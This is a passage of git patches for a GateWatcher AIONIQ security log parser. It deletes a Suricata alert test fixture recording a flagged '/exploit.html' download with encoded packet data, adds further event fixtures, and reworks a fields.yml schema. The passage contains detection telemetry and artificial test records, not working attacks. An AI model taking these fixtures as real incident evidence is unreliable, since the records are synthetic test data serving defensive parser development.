 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/suricata_alert_event.json b/GateWatcher/aioniq/tests/suricata_alert_event.json
deleted file mode 100644
index 4e84873a0..000000000
--- a/GateWatcher/aioniq/tests/suricata_alert_event.json
+++ /dev/null
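Review bot: The `network` object expected here carries only `transport`, whereas the sibling `sigflow-file.json` expectation also pins `network.protocol: "http"`; this input has no `app_proto` key, but its `event_type` is `http` and it includes a full `http` object, so the application protocol is known from the record. If the parser derives `network.protocol` solely from `app_proto`, a fallback to `event_type` for Suricata `http` records would make the two fixtures consistent, and the expectation here would become `"network": { "protocol": "http", "transport": "TCP" }`. The 302 redirect target from the input's `http.location` (`cdnfiles.4shared.com`) is also absent from `related.hosts`, which is the pivot an analyst following this download chain would look for; whether it belongs in this fixture depends on whether the parser is meant to extract it.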
@@ -1,101 +0,0 @@ -{ - "input": { - "message": "{\"@timestamp\":\"2022-06-03T14:59:41.373Z\",\"gcenter\":[\"gcenter-sekoia.gatewatcher.com\",\"gcenter-sekoia.gatewatcher.com\"],\"event_type\":\"alert\",\"payload\":\"SFRUUC8xLjEgMjAwIE9LCkRhdGU6IFRodSwgMDIgSnVuIDIwMjIgMjI6Mzc6MjIgR01UClNlcnZlcjogQXBhY2hlLzIuNC40MSAoVWJ1bnR1KQpMYXN0LU1vZGlmaWVkOiBUaHUsIDAyIEp1biAyMDIyIDIyOjMwOjM0IEdNVApFVGFnOiAiMTdkOS01ZTA3ZThkZGI0NTA4LWd6aXAiCkFjY2VwdC1SYW5nZXM6IGJ5dGVzClZhcnk6IEFjY2VwdC1FbmNvZGluZwpDb250ZW50LUVuY29kaW5nOiBnemlwCkNvbnRlbnQtTGVuZ3RoOiAyNDg1CktlZXAtQWxpdmU6IHRpbWVvdXQ9NSwgbWF4PTEwMApDb25uZWN0aW9uOiBLZWVwLUFsaXZlCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sCgp0ZXN0Cg==\",\"packet\":\"CAAnjitsCAAnk+hwCABFAAAoBRhAAD8GMWkKAQHewKg4yABQwow7Z24SQI3k4FAQAfUWzAAA\",\"type\":\"suricata\",\"community_id\":\"1:dGVzdAo=\",\"app_proto\":\"http\",\"src_ip\":\"9.8.7.6\",\"dest_port\":49804,\"alert\":{\"action\":\"allowed\",\"rev\":2,\"signature\":\"ETPRO INFO Observed Suspicious Base64 Encoded Wide String Inbound (exe)\",\"category\":\"Potentially Bad Traffic\",\"gid\":1,\"metadata\":{\"updated_at\":[\"2020_11_17\"],\"created_at\":[\"2020_04_13\"],\"former_category\":[\"HUNTING\"],\"signature_severity\":[\"Informational\"],\"attack_target\":[\"Client_Endpoint\"],\"deployment\":[\"Perimeter\"],\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"]},\"signature_id\":2841990,\"severity\":2},\"flow\":{\"pkts_toserver\":5,\"bytes_toserver\":798,\"start\":\"2022-06-03T14:59:08.750205+0000\",\"pkts_toclient\":4,\"bytes_toclient\":3052},\"files\":[{\"filename\":\"/exploit.html\",\"state\":\"CLOSED\",\"tx_id\":0,\"sid\":[1100029],\"magic\":\"HTML document, ASCII text, with very long 
lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"size\":6105,\"stored\":false}],\"proto\":\"TCP\",\"stream\":1,\"host\":\"network.internal\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"ether\":{\"src_mac\":\"08:00:27:8e:2b:6c\",\"dest_mac\":\"08:00:27:93:e8:70\"},\"src_port\":80,\"flow_id\":1686930575880829,\"payload_printable\":\"HTTP/1.1 200 OK\\r\\nDate: Thu, 02 Jun 2022 22:37:22 GMT\\r\\nServer: Apache/2.4.41 (Ubuntu)\\r\\nLast-Modified: Thu, 02 Jun 2022 22:30:34 GMT\\r\\nETag: \\\"17d9-5e07e8ddb4508-gzip\\\"\\r\\nAccept-Ranges: bytes\\r\\nVary: Accept-Encoding\\r\\nContent-Encoding: gzip\\r\\nContent-Length: 2485\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n...........Xko........\\n.F&.$VS..]pmYRa.Vd9q.(.........gW......#7....G....s.=.RO.....q..&n.....0.k...|{D.....!6.....V&nB.6.oVap......}7........l..>..{>{..~k.n..f.5]o.....X..k._G....U.....|...\\\\.a.m.f......._.!...c.8.Z..n.0........i..`.:..c[.a..;......_.........gv}.L.1V.G.......o.2,}..C~..w.(,...[..at+..8.~..'.mh1a..y......hVc0.n.iB.en.Z..O.]...l.b..2.b..{|i|._+...o].3}..Wd....3\\\"...!:.............C./.Z.....\\rP$S,.t.s.k..!..r..UI..g...ji^V...,.k..0i...}.!.=.......2.%.@..=u........{'Y@.k.8!.*`... ..c..z.j.u.D.....*......G.ng.U.....@.3U......\\n...$/..!.c.....T..S..tr.$...h......$(....&R...i.U#PL.J{...\\n!E.-9,w.....$%Xh9.U!...6...S`b...C>.i.cW......H...It\\n...B......q.IR....\\n..P&....i.d... 
.07.]U$tD.R...J4............^....tIT....UaD....g..k.b.......\\rm.VcK....p:....P.Dj...\\nD*0u*..b..(..P...\\\\S..Q*VT'......m.............7B..D./\\\"...gX..\\\".9W....I.=.9......T.%.U....J{b.l.\\r..Q.X.t9U.i)......R.i..V.g.5c..^.,.....&=r..p0SX..E...S5hsSJt..J...'}#8.........R.H.D.(i.TW...^.&..>@v..+sX\\ra..],>I.!%.`l`..,vDvL.....vDwM....,.I.-[3IP.I..GMi.I.MYa..'Z$U]r...... j3CE).NM!.@.!a......T.S.77....k&...P.........8...$..:.A.....+A........a......Mm..*..\\\\..zZ\\\"\\n...D.I.e.....r..9..JD..8.u`vd{..=.)Y.9...\\\\A'.}J...'.A?....)...........U....M5.`....J.&..e.D....N{1.s...d....cZE....\\nG)..8.nq)..G..`..@.T.rgB..B.9>7.@.\\\\&#'EUT...;Xt?...P.%W'.,@(\\r.+Y...4.y~.{d.&xn\\\"...../].....k.m.ZK`..M.lr.....VK.\\\"z&.R+.V.<-..U.\\\"...IU.h%/9....y....T)].f..._.I.X0K.k...|-t...\\\\.d#7.A..J..I.L.H7:.r..%].Ti......(....V-i....2...:...`J...\\\"S\\\"..?I.......w..E....Q.......B.l$.T.E....-......k.u........BQ.#.Tn@.C..x.7.K/...M...},..-L.......~..E.@..o.7.. .!.t....._q.....\\\\........H...Y...MA...`U.8..O..z.J.l#91..\\\".+...Vi..v..k......%.k...0i..u.T.O#A.[j.M...*G*W..s.......V..+.%.......t:..&<....Uz..2.....{....\\\\.{a.H.-.D.QC..]|>3..t5.........9.._n.U..1Ly.....(v.Fm...agn..zs.s=0..........;..U..\\n.........bs...[={.A....oG...7.../.}...yz.>......7......B;.....m\\r.../....F!../O./.n...~~..u$.~....hz..e..n.@(.=.Ui.../.\\\\_-F{..........W....~...g}......W........uWvm..ve1~n...vo_<.....=.......}e.v..gOl.^D{vJ..k_........>......y|.........k.=..W.?}.s.../^......=.4.#=.~..l?.}.}k._.....K>...k....._...:...N........`}C......w.................:.wW...Z.....~.....}.._..%?.W8.....$.R..y...............sCq.....y.....)^e....gS^..{>{..~k.n..f.5]o.....X..k._G....U.....|...\\\\.a.m.f......._.!...c.8.Z..n.0........i..`.:..c[.a..;......_.........gv}.L.1V.G.......o.2,}..C~..w.(,...[..at+..8.~..'.mh1a..y......hVc0.n.iB.en.Z..O.]...l.b..2.b..{|i|._+...o].3}..Wd....3\\\"...!:.............C./.Z.....\\rP$S,.t.s.k..!..r..UI..g...ji^V...,.k..0i...}.!.=.......2.%.@..=u........{'Y@.k.8!.*`... 
..c..z.j.u.D.....*......G.ng.U.....@.3U......\\n...$/..!.c.....T..S..tr.$...h......$(....&R...i.U#PL.J{...\\n!E.-9,w.....$%Xh9.U!...6...S`b...C>.i.cW......H...It\\n...B......q.IR....\\n..P&....i.d... .07.]U$tD.R...J4............^....tIT....UaD....g..k.b.......\\rm.VcK....p:....P.Dj...\\nD*0u*..b..(..P...\\\\S..Q*VT'......m.............7B..D./\\\"...gX..\\\".9W....I.=.9......T.%.U....J{b.l.\\r..Q.X.t9U.i)......R.i..V.g.5c..^.,.....&=r..p0SX..E...S5hsSJt..J...'}#8.........R.H.D.(i.TW...^.&..>@v..+sX\\ra..],>I.!%.`l`..,vDvL.....vDwM....,.I.-[3IP.I..GMi.I.MYa..'Z$U]r...... j3CE).NM!.@.!a......T.S.77....k&...P.........8...$..:.A.....+A........a......Mm..*..\\\\..zZ\\\"\\n...D.I.e.....r..9..JD..8.u`vd{..=.)Y.9...\\\\A'.}J...'.A?....)...........U....M5.`....J.&..e.D....N{1.s...d....cZE....\\nG)..8.nq)..G..`..@.T.rgB..B.9>7.@.\\\\&#'EUT...;Xt?...P.%W'.,@(\\r.+Y...4.y~.{d.&xn\\\"...../].....k.m.ZK`..M.lr.....VK.\\\"z&.R+.V.<-..U.\\\"...IU.h%/9....y....T)].f..._.I.X0K.k...|-t...\\\\.d#7.A..J..I.L.H7:.r..%].Ti......(....V-i....2...:...`J...\\\"S\\\"..?I.......w..E....Q.......B.l$.T.E....-......k.u........BQ.#.Tn@.C..x.7.K/...M...},..-L.......~..E.@..o.7.. 
.!.t....._q.....\\\\........H...Y...MA...`U.8..O..z.J.l#91..\\\".+...Vi..v..k......%.k...0i..u.T.O#A.[j.M...*G*W..s.......V..+.%.......t:..&<....Uz..2.....{....\\\\.{a.H.-.D.QC..]|>3..t5.........9.._n.U..1Ly.....(v.Fm...agn..zs.s=0..........;..U..\\n.........bs...[={.A....oG...7.../.}...yz.>......7......B;.....m\\r.../....F!../O./.n...~~..u$.~....hz..e..n.@(.=.Ui.../.\\\\_-F{..........W....~...g}......W........uWvm..ve1~n...vo_<.....=.......}e.v..gOl.^D{vJ..k_........>......y|.........k.=..W.?}.s.../^......=.4.#=.~..l?.}.}k._.....K>...k....._...:...N........`}C......w.................:.wW...Z.....~.....}.._..%?.W8.....$.R..y...............sCq.....y.....)^e....gS^ Date: Mon, 16 Sep 2024 11:32:22 +0200 Subject: [PATCH 026/317] adding test files and cleaning of unsused fields --- GateWatcher/aioniq_ecs/_meta/fields.yml | 373 +++++++++++++----- .../aioniq_ecs/tests/beacon_event.json | 92 +++++ .../tests/codebreaker_powershell_alert.json | 85 ++++ .../tests/codebreaker_shellcode_alert.json | 92 +++++ GateWatcher/aioniq_ecs/tests/dga_event.json | 90 +++++ GateWatcher/aioniq_ecs/tests/history.json | 52 +++ GateWatcher/aioniq_ecs/tests/ioc.json | 96 +++++ .../aioniq_ecs/tests/malcore_event.json | 154 ++++++++ GateWatcher/aioniq_ecs/tests/metadata.json | 113 ++++++ .../aioniq_ecs/tests/metadata_fileinfo.json | 117 ++++++ GateWatcher/aioniq_ecs/tests/nba.json | 139 +++++++ GateWatcher/aioniq_ecs/tests/ransomware.json | 87 ++++ GateWatcher/aioniq_ecs/tests/retrohunt.json | 49 +++ .../aioniq_ecs/tests/sigflow_alert.json | 127 ++++++ .../aioniq_ecs/tests/sigflow_stats.json | 48 +++ 15 files changed, 1611 insertions(+), 103 deletions(-) create mode 100644 GateWatcher/aioniq_ecs/tests/beacon_event.json create mode 100644 GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json create mode 100644 GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json create mode 100644 GateWatcher/aioniq_ecs/tests/dga_event.json create mode 100644 
GateWatcher/aioniq_ecs/tests/history.json
create mode 100644 GateWatcher/aioniq_ecs/tests/ioc.json
create mode 100644 GateWatcher/aioniq_ecs/tests/malcore_event.json
create mode 100644 GateWatcher/aioniq_ecs/tests/metadata.json
create mode 100644 GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
create mode 100644 GateWatcher/aioniq_ecs/tests/nba.json
create mode 100644 GateWatcher/aioniq_ecs/tests/ransomware.json
create mode 100644 GateWatcher/aioniq_ecs/tests/retrohunt.json
create mode 100644 GateWatcher/aioniq_ecs/tests/sigflow_alert.json
create mode 100644 GateWatcher/aioniq_ecs/tests/sigflow_stats.json
diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index e6f4b0b85..733dd5550 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -1,1131 +1,1298 @@ +ecs.version: + description: version of ECS used (mandatory field) + name: ecs.version + type: text + gatewatcher.beacon.active: description: beacon active field name: gatewatcher.beacon.active type: text + gatewatcher.beacon.hostname_resolution: description: beacon hostname_resolution field name: gatewatcher.beacon.hostname_resolution type: text + gatewatcher.beacon.id: description: beacon id field name: gatewatcher.beacon.id type: text + gatewatcher.beacon.mean_time_interval: description: beacon mean_time_interval name: gatewatcher.beacon.mean_time_interval type: text + gatewatcher.beacon.possible_cnc: description: beaocn possible_cnc field name: gatewatcher.beacon.possible_cnc type: text + gatewatcher.beacon.session_count: description: beacon session_count field name: gatewatcher.beacon.session_count type: text + gatewatcher.beacon.type: description: beacon type field name: gatewatcher.beacon.type type: text -gatewatcher.dcerpc: - description: dcerpc metadata field - name: gatewatcher.dcerpc - type: text + gatewatcher.dcerpc.call_id: description: dcerpc call_id field name: gatewatcher.dcerpc.call_id type: number + gatewatcher.dcerpc.interfaces: description: dcerpc interfaces field name: gatewatcher.dcerpc.interfaces type: text + gatewatcher.dcerpc.req: description: dcerpc req field name: gatewatcher.dcerpc.req type: text + gatewatcher.dcerpc.request: description: dcerpc request field name: gatewatcher.dcerpc.request type: text + gatewatcher.dcerpc.res: description: dcerpc res field name: gatewatcher.dcerpc.res type: text + gatewatcher.dcerpc.response: description: dcerpc response field name: gatewatcher.dcerpc.response type: text + gatewatcher.dcerpc.rpc_version: description: dcerpc rpc_version field name: gatewatcher.dcerpc.rpc_version type: text + gatewatcher.dga.dga_count: description: dga dga_count field name: gatewatcher.dga.dga_count type: text + gatewatcher.dga.dga_ratio: description: dga dga_ratio field name: 
gatewatcher.dga.dga_ratio type: text + gatewatcher.dga.malware_behavior_confidence: description: dga malware_behavior_confidence field name: gatewatcher.dga.malware_behavior_confidence type: text + gatewatcher.dga.nx_domain_count: description: dga nx_domain_count field name: gatewatcher.dga.nx_domain_count type: text + gatewatcher.dga.top_DGA: description: dga top_DGA field name: gatewatcher.dga.top_DGA type: text -gatewatcher.dhcp: - description: dhcp metadata field - name: gatewatcher.dhcp - type: text + gatewatcher.dhcp.assigned_ip: description: dhcp assigned_ip field name: gatewatcher.dhcp.assigned_ip type: ip + gatewatcher.dhcp.client_ip: description: dhcp client_ip field name: gatewatcher.dhcp.client_ip type: ip + gatewatcher.dhcp.client_mac: description: dhcp client_mac field name: gatewatcher.dhcp.client_mac type: text + gatewatcher.dhcp.dhcp_type: description: dhcp dhcp_type field name: gatewatcher.dhcp.dhcp_type type: text + gatewatcher.dhcp.dns_servers: description: dhcp dns_servers field name: gatewatcher.dhcp.dns_servers type: text + gatewatcher.dhcp.hostname: description: dhcp hostname field name: gatewatcher.dhcp.hostname type: text + gatewatcher.dhcp.id: description: dhcp id field name: gatewatcher.dhcp.id type: number + gatewatcher.dhcp.lease_time: description: dhcp lease_time field name: gatewatcher.dhcp.lease_time type: number -gatewatcher.dhcp.lease_type: - description: dhcp lease_type field - name: gatewatcher.dhcp.lease_type - type: number + gatewatcher.dhcp.next_server_ip: description: dhcp next_server_ip field name: gatewatcher.dhcp.next_server_ip type: ip + gatewatcher.dhcp.relay_ip: description: dhcp relay_ip field name: gatewatcher.dhcp.relay_ip type: ip + gatewatcher.dhcp.routers: description: dhcp routers field name: gatewatcher.dhcp.routers type: text + gatewatcher.dhcp.subnet_mask: description: dhcp subnet_mask field name: gatewatcher.dhcp.subnet_mask type: ip + gatewatcher.dhcp.type: description: dhcp type field name: 
gatewatcher.dhcp.type type: text + gatewatcher.dnp3.application: description: dnp3 application field name: gatewatcher.dnp3.application type: text + gatewatcher.dnp3.control: description: dnp3 control field name: gatewatcher.dnp3.control type: text + gatewatcher.dnp3.dst: description: dnp3 dst field name: gatewatcher.dnp3.dst type: number + gatewatcher.dnp3.iin: description: dnp3 iin field name: gatewatcher.dnp3.iin type: text + gatewatcher.dnp3.src: description: dnp3 src field name: gatewatcher.dnp3.src type: text + gatewatcher.dnp3.type: description: dnp3 type field name: gatewatcher.dnp3.type type: text + gatewatcher.dns: description: dns metadata field name: gatewatcher.dns type: text + gatewatcher.email.body_md5: description: smtp email subject_md5 field name: gatewatcher.email.body_md5 type: text + gatewatcher.email.from: description: email from field name: gatewatcher.email.from type: text + gatewatcher.email.status: description: email status field name: gatewatcher.email.status type: text + gatewatcher.email.subject_md5: description: smtp subject_md5 field name: gatewatcher.email.subject_md5 type: text + gatewatcher.email.to: description: email to field name: gatewatcher.email.to type: text + gatewatcher.event.created: description: Event created field name: gatewatcher.event.created type: datetime + gatewatcher.event.id: description: Event id field name: gatewatcher.event.id type: text -gatewatcher.event_type: - description: Type of event - name: gatewatcher.event_type - type: keyword + gatewatcher.file.file_id: description: file file_id field name: gatewatcher.file.file_id type: number + gatewatcher.file.gaps: description: file gaps field name: gatewatcher.file.gaps type: boolean -gatewatcher.file.hash.md5: - description: File MD5 hash field - name: gatewatcher.file.hash.md5 - type: text -gatewatcher.file.hash.sha256: - description: File SHA256 hash field - name: gatewatcher.file.hash.sha256 - type: text + gatewatcher.file.magic: description: File magic 
field name: gatewatcher.file.magic type: text + gatewatcher.file.sid: description: file sid array field name: gatewatcher.file.sid type: text + gatewatcher.file.state: description: File state field name: gatewatcher.file.state type: text + gatewatcher.file.stored: description: File stored field name: gatewatcher.file.stored type: boolean + gatewatcher.file.tx_id: description: file tx_id field name: gatewatcher.file.tx_id type: number + gatewatcher.files: description: files field name: gatewatcher.files type: text + gatewatcher.flow.bytes_toclient: description: flow bytes_toclient field name: gatewatcher.flow.bytes_toclient type: number + gatewatcher.flow.bytes_toserver: description: flow bytes_toserver field name: gatewatcher.flow.bytes_toserver type: number + gatewatcher.flow.pkts_toclient: description: flow pkts_toclient field name: gatewatcher.flow.pkts_toclient type: number + gatewatcher.flow.pkts_toserver: description: flow pkts_toserver field name: gatewatcher.flow.pkts_toserver type: number + gatewatcher.flow.start: description: flow start field name: gatewatcher.flow.start type: datetime -gatewatcher.ftp: - description: ftp metadata field - name: gatewatcher.ftp - type: text -gatewatcher.ftp.command: - description: ftp command field - name: gatewatcher.ftp.command - type: text -gatewatcher.ftp.command_truncated: - description: ftp command_truncated field - name: gatewatcher.ftp.command_truncated - type: boolean + gatewatcher.ftp.completion_code: description: ftp completion_code field name: gatewatcher.ftp.completion_code type: text + gatewatcher.ftp.reply: description: ftp reply field name: gatewatcher.ftp.reply type: text + gatewatcher.ftp.reply_received: description: ftp reply_received field name: gatewatcher.ftp.reply_received type: text + gatewatcher.ftp.reply_truncated: description: ftp reply_truncated field name: gatewatcher.ftp.reply_truncated type: boolean + gatewatcher.ftp_data.command: description: ftp_data command field name: 
gatewatcher.ftp_data.command type: text + gatewatcher.ftp_data.filename: description: ftp_data filename field name: gatewatcher.ftp_data.filename type: text -gatewatcher.gcap: - description: Name of the gcap - name: gatewatcher.gcap - type: keyword -gatewatcher.gcenter: - description: Name of the associated gcenter - name: gatewatcher.gcenter - type: keyword + gatewatcher.history.code: description: history code field name: gatewatcher.history.code type: number + gatewatcher.history.content: description: history content field name: gatewatcher.history.content type: text + gatewatcher.history.endpoint: description: history endpoint field name: gatewatcher.history.endpoint type: text + gatewatcher.history.id: description: history id field name: gatewatcher.history.id type: number + gatewatcher.history.ip: description: history ip field name: gatewatcher.history.ip type: ip + gatewatcher.history.method: description: history method field name: gatewatcher.history.method type: text + gatewatcher.history.name: description: history name field name: gatewatcher.history.name type: text + gatewatcher.history.type: description: history type field name: gatewatcher.history.type type: text -gatewatcher.http: - description: http metadata field - name: gatewatcher.http - type: text + gatewatcher.http.accept: description: 'http accept metadata field ' name: gatewatcher.http.accept type: text + gatewatcher.http.accept_language: description: http accept language field name: gatewatcher.http.accept_language type: text + gatewatcher.http.hostname: description: http hostname field metadata name: gatewatcher.http.hostname type: text + gatewatcher.http.http2: description: http http2 field name: gatewatcher.http.http2 type: text + gatewatcher.http.http_refer: description: http_refer field name: gatewatcher.http.http_refer type: text + gatewatcher.ikev2.errors: description: ikev2 errors field name: gatewatcher.ikev2.errors type: number + gatewatcher.ikev2.exchange_type: description: ikev2 
exchange_type field name: gatewatcher.ikev2.exchange_type type: number + gatewatcher.ikev2.init_spi: description: ikev2 init_spi field name: gatewatcher.ikev2.init_spi type: text + gatewatcher.ikev2.message_id: description: ikev2 message_id field name: gatewatcher.ikev2.message_id type: number + gatewatcher.ikev2.notify: description: ikev2 notify field name: gatewatcher.ikev2.notify type: text + gatewatcher.ikev2.payload: description: ikev2 payload field name: gatewatcher.ikev2.payload type: text + gatewatcher.ikev2.resp_spi: description: ikev2 resp_spi field name: gatewatcher.ikev2.resp_spi type: text + gatewatcher.ikev2.role: description: ikev2 role field name: gatewatcher.ikev2.role type: text + gatewatcher.ikev2.version_major: description: ikev2 version_major field name: gatewatcher.ikev2.version_major type: number + gatewatcher.ikev2.version_minor: description: ikev2 version_minor field name: gatewatcher.ikev2.version_minor type: number -gatewatcher.ioc.campaings: + +gatewatcher.ioc.campaigns: description: ioc campaigns field - name: gatewatcher.ioc.campaings + name: gatewatcher.ioc.campaigns type: text + gatewatcher.ioc.case_id: description: ioc case_id field name: gatewatcher.ioc.case_id type: text + gatewatcher.ioc.categories: description: ioc categories field name: gatewatcher.ioc.categories type: text + gatewatcher.ioc.creation_date: description: ioc creation_date field name: gatewatcher.ioc.creation_date type: datetime + gatewatcher.ioc.description: description: ioc description field name: gatewatcher.ioc.description type: text -gatewatcher.ioc.extrernal_links: + +gatewatcher.ioc.external_links: description: ioc external_links field - name: gatewatcher.ioc.extrernal_links + name: gatewatcher.ioc.external_links type: text + gatewatcher.ioc.families: description: ioc families field name: gatewatcher.ioc.families type: text + gatewatcher.ioc.kill_chain_phases: description: ioc kill_chain_phases field name: gatewatcher.ioc.kill_chain_phases type: text + 
gatewatcher.ioc.meta_data.cwe: description: ioc meta_data cwe field name: gatewatcher.ioc.meta_data.cwe type: text + gatewatcher.ioc.meta_data.descriptions: description: ioc meta_data descriptions field name: gatewatcher.ioc.meta_data.descriptions type: text + gatewatcher.ioc.meta_data.usageMode: description: ioc meta_data usageMode field name: gatewatcher.ioc.meta_data.usageMode type: text + gatewatcher.ioc.package_date: description: ioc package_date field name: gatewatcher.ioc.package_date type: datetime + gatewatcher.ioc.relations: description: ioc relations field name: gatewatcher.ioc.relations type: text + gatewatcher.ioc.signature: description: ioc signature field name: gatewatcher.ioc.signature type: text + gatewatcher.ioc.tags: description: ioc tags field name: gatewatcher.ioc.tags type: text + gatewatcher.ioc.targeted_countries: description: ioc targeted_countires field name: gatewatcher.ioc.targeted_countries type: text + gatewatcher.ioc.targeted_organizations: description: ioc targeted_organizations field name: gatewatcher.ioc.targeted_organizations type: text + gatewatcher.ioc.targeted_platforms: description: ioc targeted_platforms field name: gatewatcher.ioc.targeted_platforms type: text + gatewatcher.ioc.targeted_sectors: description: ioc targeted_sectors field name: gatewatcher.ioc.targeted_sectors type: text + gatewatcher.ioc.threat_actor: description: ioc threat_actor field name: gatewatcher.ioc.threat_actor type: text + gatewatcher.ioc.tlp: description: ioc tlp field name: gatewatcher.ioc.tlp type: text -gatewatcher.ioc.ttp: - description: ioc ttp field - name: gatewatcher.ioc.ttp - type: text + gatewatcher.ioc.type: description: ioc type field name: gatewatcher.ioc.type type: text + gatewatcher.ioc.updated_date: description: ioc updated_date field name: gatewatcher.ioc.updated_date type: datetime + gatewatcher.ioc.usage_mode: description: ioc usage_mode field name: gatewatcher.ioc.usage_mode type: text + gatewatcher.ioc.value: description: ioc 
value field name: gatewatcher.ioc.value type: text + gatewatcher.krb5.cname: description: krb5 cname field name: gatewatcher.krb5.cname type: text + gatewatcher.krb5.encryption: description: krb5 encryption field name: gatewatcher.krb5.encryption type: text + gatewatcher.krb5.error_code: description: krb5 error_code field name: gatewatcher.krb5.error_code type: text + gatewatcher.krb5.failed_request: description: krb5 failed_request field name: gatewatcher.krb5.failed_request type: text + gatewatcher.krb5.msg_type: description: krb5 msg_type field name: gatewatcher.krb5.msg_type type: text + gatewatcher.krb5.realm: description: krb5 realm field name: gatewatcher.krb5.realm type: text + gatewatcher.krb5.sname: description: krb5 sname field name: gatewatcher.krb5.sname type: text + gatewatcher.krb5.weak_encryption: description: krb5 weak_encryption field name: gatewatcher.krb5.weak_encryption type: boolean + gatewatcher.malcore.analyzed_clean: description: malcore analyzed_clean field name: gatewatcher.malcore.analyzed_clean type: number + gatewatcher.malcore.analyzed_error: description: malcore analyzed_error field name: gatewatcher.malcore.analyzed_error type: number + gatewatcher.malcore.analyzed_infected: description: malcore analyzed_infected field name: gatewatcher.malcore.analyzed_infected type: number + gatewatcher.malcore.analyzed_other: description: malcore analyzed_other field name: gatewatcher.malcore.analyzed_other type: number + gatewatcher.malcore.analyzed_suspicious: description: malcore analyzed_suspicious field name: gatewatcher.malcore.analyzed_suspicious type: number + gatewatcher.malcore.analyzers_up: description: malcore analyzers_up field name: gatewatcher.malcore.analyzers_up type: number + gatewatcher.malcore.code: description: malcore code field name: gatewatcher.malcore.code type: number + gatewatcher.malcore.detail_scan_time: description: malcore detail_scan_time field name: gatewatcher.malcore.detail_scan_time type: number + 
gatewatcher.malcore.detail_threat_found: description: malcore detail_threat_found field name: gatewatcher.malcore.detail_threat_found type: text + gatewatcher.malcore.detail_wait_time: description: malcore detail_wait_time field name: gatewatcher.malcore.detail_wait_time type: number + gatewatcher.malcore.engine_id: description: malcore engine_id field name: gatewatcher.malcore.engine_id type: text + gatewatcher.malcore.engines_last_update_date: description: malcore engines_last_update_date field name: gatewatcher.malcore.engines_last_update_date type: datetime -gatewatcher.malcore.file: - description: Identifier of the file - name: gatewatcher.malcore.file - type: keyword + gatewatcher.malcore.file_type: description: malcore file_type field name: gatewatcher.malcore.file_type type: text + gatewatcher.malcore.file_type_description: description: malcore file_type_description field name: gatewatcher.malcore.file_type_description type: text -gatewatcher.malcore.magic: - description: The magic number of the executable of the malware - name: gatewatcher.malcore.magic - type: keyword + gatewatcher.malcore.magic_details: description: malcore magic_details field name: gatewatcher.malcore.magic_details type: text + gatewatcher.malcore.processing_time: description: malcore processing_time field name: gatewatcher.malcore.processing_time type: number -gatewatcher.malcore.replica: - description: Analysis is a replica of another previous one - name: gatewatcher.malcore.replica - type: keyword + gatewatcher.malcore.reporting_token: description: malcore reporting_token field name: gatewatcher.malcore.reporting_token type: text + gatewatcher.malcore.state: description: malcore state field name: gatewatcher.malcore.state type: text + gatewatcher.malcore.total_found: description: malcore total_found field name: gatewatcher.malcore.total_found type: text + gatewatcher.malicious_powershell.id: description: malicious_powershell id field name: gatewatcher.malicious_powershell.id type: 
text + gatewatcher.malicious_powershell.proba_obfuscated: description: malicious_powershell proba_obfuscated field name: gatewatcher.malicious_powershell.proba_obfuscated type: number + gatewatcher.malicious_powershell.sample_id: description: malicious_powershell sample_id field name: gatewatcher.malicious_powershell.sample_id type: text + gatewatcher.malicious_powershell.score: description: malicious_powershell score field name: gatewatcher.malicious_powershell.score type: number + gatewatcher.malicious_powershell.score_details: description: malicious_powershell score_details field name: gatewatcher.malicious_powershell.score_details type: text + gatewatcher.matched_event.file.gaps: description: matched_event file gaps field name: gatewatcher.matched_event.file.gaps type: text + gatewatcher.matched_event.file.hash.md5: description: matched_event file hash md5 field name: gatewatcher.matched_event.file.hash.md5 type: text + gatewatcher.matched_event.file.hash.sha256: description: matched_event file hash sha256 field name: gatewatcher.matched_event.file.hash.sha256 type: text + gatewatcher.matched_event.file.magic: description: matched_event file magic field name: gatewatcher.matched_event.file.magic type: text + gatewatcher.matched_event.file.name: description: matched_event file name field name: gatewatcher.matched_event.file.name type: text + gatewatcher.matched_event.file.sid: description: matched_event file sid field name: gatewatcher.matched_event.file.sid type: text + gatewatcher.matched_event.file.size: description: matched_event file size field name: gatewatcher.matched_event.file.size type: text + gatewatcher.matched_event.file.state: description: matched_event file state field name: gatewatcher.matched_event.file.state type: text + gatewatcher.matched_event.file.stored: description: matched_event file stored field name: gatewatcher.matched_event.file.stored type: text + gatewatcher.matched_event.file.tx_id: description: matched_event file tx_id field 
name: gatewatcher.matched_event.file.tx_id type: text + gatewatcher.matched_event.id: description: matched_event id field name: gatewatcher.matched_event.id type: text + gatewatcher.metadata.flowbits: description: metadata flowbits field name: gatewatcher.metadata.flowbits type: text + gatewatcher.mqtt.connack: description: mqtt connack field name: gatewatcher.mqtt.connack type: text -gatewatcher.nb_rescans: - description: Number of retroact analysis - name: gatewatcher.nb_rescans - type: long + gatewatcher.nba.action: description: nba action field name: gatewatcher.nba.action type: text + gatewatcher.nba.category: description: nba category field name: gatewatcher.nba.category type: text + gatewatcher.nba.gid: description: nba gid field name: gatewatcher.nba.gid type: text + gatewatcher.nba.metadata.performance_impact: description: nba metadata performance_impact field name: gatewatcher.nba.metadata.performance_impact type: text + gatewatcher.nba.metadata.signature_severity: description: nba metadata signature_severity field name: gatewatcher.nba.metadata.signature_severity type: text + gatewatcher.nba.packet: description: nba packet field name: gatewatcher.nba.packet type: text + gatewatcher.nba.payload: description: nba payload field name: 